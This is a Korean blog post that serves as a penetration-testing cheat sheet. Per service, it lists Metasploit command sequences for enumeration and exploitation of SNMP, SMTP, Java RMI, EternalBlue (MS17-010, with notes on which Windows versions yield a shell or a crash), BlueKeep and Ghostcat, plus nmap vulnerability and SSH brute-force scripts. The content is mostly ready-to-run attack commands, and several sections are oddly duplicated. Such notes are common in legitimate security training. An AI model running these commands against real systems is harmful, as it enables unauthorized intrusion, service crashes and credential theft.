반응형
#1 SNMP(udp-169)
msf > use auxiliary/scanner/snmp/snmp_enum
msf(snmp_Enum) > set RHOSTS IP/prefix
msf(snmp_Enum) > set THREADS 20
msf(snmp_Enum) > run
#2 Java RMI(1099)
msf > use auxiliary/scanner/misc/java_rmi_server
msf(java_rmi_server) > set rhosts IP
msf(java_rmi_server) > run
msf > use exploit/multi/misc/java_rmi_server
msf(java_rmi_server) > set rhosts IP
msf(java_rmi_server) > run
#3 SMTP(25)
msf > use auxiliary/scanner/smtp/smtp_enum
msf(smtp_enum) > set rhosts IP
msf(smtp_enum) > set THREADS 30
msf(smtp_enum) > run
> nc IP 25
VRFY Users
#4 SMB(139,445)
msf> use auxiliary/scanner/smb/smb_ms17_010
msf(eternalblue) > set rhosts IP
msf(eternalblue) > run
msf > use exploit/windows/smb/ms17_010_eternalblue
msf(eternalblue) > set rhosts IP
msf(eternalblue) > run
* 주의
#5 Bluekeep(3389)
msf > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
msf(bluekeep) > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
msf > exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf(bluekeep) > set RHOSTS IP
msf(bluekeep) > set targets Id
msf(bluekeep) > run
#6 printnightmare(printspooler)
https://jdh5202.tistory.com/869
#7 sniffer
msf > use auxiliary/sniffer/psnuffle
msf(psnuffle) > set rhosts IP
msf(psnuffle) > run
#8 ajp(8009)
# nmap
nmap -p 445 --script smb-vuln-ms17-010 127.0.0.1
nmap 127.0.0.1 -p 22 --script ssh-brute --script-args userdb=users.txt,passdb=passwords.txt
nmap -p 21 -sS --script ftp-anon 127.0.0.1
nmap -p 3306 --script mysql-info 127.0.0.1
nmap -p 3306 --script mysql-enum 127.0.0.1
nmap -sV -p21-8080 --script vulners 127.0.0.1
msf > use auxiliary/scanner/snmp/snmp_enum
msf(snmp_Enum) > set RHOSTS IP/prefix
msf(snmp_Enum) > set THREADS 20
msf(snmp_Enum) > run
#2 Java RMI(1099)
msf > use auxiliary/scanner/misc/java_rmi_server
msf(java_rmi_server) > set rhosts IP
msf(java_rmi_server) > run
msf > use exploit/multi/misc/java_rmi_server
msf(java_rmi_server) > set rhosts IP
msf(java_rmi_server) > run
#3 SMTP(25)
msf > use auxiliary/scanner/smtp/smtp_enum
msf(smtp_enum) > set rhosts IP
msf(smtp_enum) > set THREADS 30
msf(smtp_enum) > run
> nc IP 25
VRFY Users
#4 SMB(139,445)
msf> use auxiliary/scanner/smb/smb_ms17_010
msf(eternalblue) > set rhosts IP
msf(eternalblue) > run
msf > use exploit/windows/smb/ms17_010_eternalblue
msf(eternalblue) > set rhosts IP
msf(eternalblue) > run
* 주의
일부 시스템에서 이 모듈은 BSOD(블루스크린) 또는 재부팅됨
셸 획득 가능 - 윈도우 서버 2008 R2 SP1
BSOD 유발 - 윈도우 XP, 윈도우 서버 2003, 윈도우7 SP1
셸 획득 가능 - 윈도우 서버 2008 R2 SP1
BSOD 유발 - 윈도우 XP, 윈도우 서버 2003, 윈도우7 SP1
#5 Bluekeep(3389)
msf > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
msf(bluekeep) > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
msf > exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf(bluekeep) > set RHOSTS IP
msf(bluekeep) > set targets Id
msf(bluekeep) > run
영향 시스템: Windows XP, 2003, Vista, 2008 및 Windows 7, * BSOD 주의
#6 printnightmare(printspooler)
https://jdh5202.tistory.com/869
#7 sniffer
msf > use auxiliary/sniffer/psnuffle
msf(psnuffle) > set rhosts IP
msf(psnuffle) > run
#8 ajp(8009)
> git clone https://github.com/00theway/Ghostcat-CNVD-2020-10487
> python3 ajpShooter.py http://IP/index.jsp 8009 /WEB-INF/web.xml read
#9 robots_txt
msf > use auxiliary/scanner/http/robots_txt
msf(robots_txt) > set rhosts IP
msf(robots_txt) > set THREADS 20
msf(robots_txt) > run
# nmap
nmap -p 445 --script smb-vuln-ms17-010 127.0.0.1
nmap 127.0.0.1 -p 22 --script ssh-brute --script-args userdb=users.txt,passdb=passwords.txt
nmap -p 21 -sS --script ftp-anon 127.0.0.1
nmap -p 3306 --script mysql-info 127.0.0.1
nmap -p 3306 --script mysql-enum 127.0.0.1
nmap -sV -p21-8080 --script vulners 127.0.0.1
반응형
'해킹-보안' 카테고리의 다른 글
| jwt(JSON Web Token) 개념 (0) | 2021.11.26 |
|---|---|
| 엑셀 VBA 프로젝트 암호 보호 해제 (0) | 2021.09.08 |
| Print Spooler(CVE-2021-1675) exploit (0) | 2021.09.05 |
| rpcbind(111) nfs(2049) exploit (0) | 2021.09.05 |
| 패스워드 사전 파일 생성 (0) | 2021.09.04 |
